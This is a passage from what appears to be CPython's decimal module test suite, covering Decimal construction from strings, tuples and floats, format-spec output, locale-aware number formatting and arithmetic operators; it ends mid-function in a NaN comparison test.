except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
        #engineering notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
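        # (Decimal's operators return NotImplemented for operands they do not
        # recognize, so Python falls back to E's reflected methods below.)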
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
            ('6', '123', '   123'),
            ('<6', '123', '123   '),
            ('>6', '123', '   123'),
            ('^6', '123', ' 123  '),
            ('=+6', '123', '+  123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
            ('=10.10%', 'NaN123', '   NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
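        # e.g. Decimal('NaN') == Decimal('NaN') is simply False, whereas
        # Decimal('NaN') < Decimal('2') signals InvalidOperation (and raises
        # if that signal is trapped, as exercised below).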
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
